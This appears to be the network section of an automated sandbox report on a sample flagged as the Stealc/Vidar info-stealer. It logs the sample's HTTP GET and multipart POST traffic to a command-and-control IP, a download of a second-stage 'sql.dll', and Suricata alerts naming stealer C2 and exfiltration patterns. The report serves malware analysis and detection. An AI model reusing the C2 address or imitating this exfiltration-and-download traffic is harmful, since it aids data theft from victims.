Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 147.45.68.138 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
GET
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: 147.45.68.138
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID
Host: 147.45.68.138
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI
Host: 147.45.68.138
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGI
Host: 147.45.68.138
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB
Host: 147.45.68.138
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA
Host: 147.45.68.138
Content-Length: 4357
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://147.45.68.138/sql.dll
REQUEST
RESPONSE
BODY
GET /sql.dll HTTP/1.1
Host: 147.45.68.138
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:20 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
Connection: keep-alive
ETag: "6560a86a-258600"
Accept-Ranges: bytes
POST
200
http://147.45.68.138/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG
Host: 147.45.68.138
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 02:01:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49167 -> 147.45.68.138:80 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | A Network Trojan was detected |
| TCP 147.45.68.138:80 -> 192.168.56.103:49167 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49167 -> 147.45.68.138:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
| TCP 147.45.68.138:80 -> 192.168.56.103:49167 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 147.45.68.138:80 -> 192.168.56.103:49167 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 147.45.68.138:80 -> 192.168.56.103:49165 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts